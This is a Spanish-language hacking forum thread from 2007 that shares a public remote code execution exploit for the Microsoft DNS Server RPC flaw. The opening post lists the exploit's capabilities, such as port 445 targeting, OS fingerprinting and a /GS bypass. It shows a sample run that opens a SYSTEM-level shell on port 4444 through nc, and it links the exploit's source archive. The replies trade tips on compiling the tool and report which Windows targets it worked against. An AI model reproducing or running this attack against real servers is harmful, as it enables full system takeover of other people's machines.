elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
16 Octubre 2008, 03:02  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]  (Leído 2146 veces)
ANELKAOS
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.623



Ver Perfil WWW
Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
« en: 16 Abril 2007, 19:42 »

El amigo Andrés Tarascó ha publicado junto con Mario Ballano un nuevo exploit para la vulnerabilidad remota del servicio de DNS de Microsoft que permitiría a un usuario la ejecución remota de código con privilegios de SYSTEM.

El advisory lo podeis leer aquí:
http://www.microsoft.com/technet/security/advisory/935964.mspx

Al contrario que los reportes iniciales de Microsoft, han notificado de que su exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.

Han actualizado la primera versión de la prueba de concepto con muchas novedades (tanto para Windows 2000 como 2003). Entre las nuevas funcionalidades tenemos:

- Ataque por defecto al puerto 445 (requiere autenticación)
- Permite seleccionar puertos tcp dinamicos (sin autenticación)
- Identificación automática de puertos rpc dinámicos del dns
- Identificación local y remota de sistema operativo para ajuste de offsets
- Windows 2000 server y Windows 2003 server (Spanish) soportados por defecto
- Solucionados bugs en la shellcode de windows 2003
- Exploit universal en local para windows 2000 (búsqueda automática de opcodes)
- Exploit universal en local y remoto para Windows 2003 (unicode.nls) saltando la protección /GS (pero no DEP)
- Agregado soporte para windows 2000 en ingles e italiano (no verificado)
- Uso de la api de RPC de Microsoft :-)

A continuación se muestra un ejemplo del uso del exploit contra un sistema windows 2000 server:

Ejemplo del uso del exploit:

Citar
D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.7
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

  • Trying to fingerprint target.. (05.00)
  • Remote Host identified as Windows 2000
  • [-] No port selected. Trying Ninja sk1llz
  • Binding to ncacn_ip_tcp:192.168.1.7
  • Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
  • RPC binding string: ncacn_ip_tcp:192.168.1.7[1028]
  • Dynamic DNS rpc port found (1028)
  • Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.7[1028]
  • RpcBindingFromStringBinding success
  • Selected target 0x79467ef8
  • Sending Exploit code to DnssrvOperation()
  • Now try to connect to port 4444

D:\>nc 192.168.1.7 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM


Descarga del código fuente del exploit y el análisis del mismo:

http://www.514.es/Microsoft_Dns_Server_Exploit_v2.1.zip

Fuente: http://www.514.es/2007/04/exploit_remoto_para_el_servici.html
« Última modificación: 19 Abril 2007, 16:49 por ANELKAOS » En línea

Sr.Deep

Desconectado Desconectado

Mensajes: 458

jaja este si no me lo van a joder xD


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft
« Respuesta #1 en: 17 Abril 2007, 04:59 »

:D:D:D:D  ,  gran aporte como siempre lo han hecho...mmm... el  executable ya compilado , me da errror es solo a mi o hay mas personas???
En línea
yeikos
Colaborador

Desconectado Desconectado

Mensajes: 1.363



Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft
« Respuesta #2 en: 17 Abril 2007, 15:01 »

Si dices qué error te da...
En línea
Sr.Deep

Desconectado Desconectado

Mensajes: 458

jaja este si no me lo van a joder xD


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft
« Respuesta #3 en: 17 Abril 2007, 23:02 »


En línea
c3r0x

Desconectado Desconectado

Mensajes: 41


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft
« Respuesta #4 en: 17 Abril 2007, 23:22 »

dios cuando sera q la gente aprendera....baja esa dll pon en google el nombre de la dll  name.dll download  ahi te aparece

salu2
En línea
Sr.Deep

Desconectado Desconectado

Mensajes: 458

jaja este si no me lo van a joder xD


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft
« Respuesta #5 en: 17 Abril 2007, 23:57 »

Grax lo puedo resolver.
En línea
revolt

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
« Respuesta #6 en: 19 Abril 2007, 22:24 »

pues lo he provado al parecer, mis resultados

es facil scanear pc son windows server y saber q tienen el servicio dns corriendo ...


testeado ....

windows 2000 server sp4 spanish --- funciona
windows 2000 server sp4 inglish ---- no funciona

en los windows 2k3 sp1 sp2 tampoco funciona ... so falta ver quien manda el osffet correcto para windows 2000 server sp4 ingles ... para testear  =)


saludos

En línea
Ferсhu

Desconectado Desconectado

Mensajes: 1.221

Menos palabras y Mas codigos.


Ver Perfil WWW
Re: Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
« Respuesta #7 en: 25 Abril 2007, 03:55 »

el codigo fuente no incluye el dnsxpl.h, es medio raro q se lo olviden...tengo el .exe pero no lo probe por q prefiero compilarlo yo.
En línea

X_-:XploitX:-_X

Desconectado Desconectado

Mensajes: 35



Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
« Respuesta #8 en: 04 Junio 2007, 11:44 »

gran aporte
En línea

si Windows fuera perfecto no existira Linux para serlo
transit

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: Exploit remoto para el servicio DNS de Microsoft [ACTUALIZADO]
« Respuesta #9 en: 13 Junio 2007, 23:11 »

hola

¿con que lo habeis compilado? Probe con dev c++ y no me deja.

Gracias
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC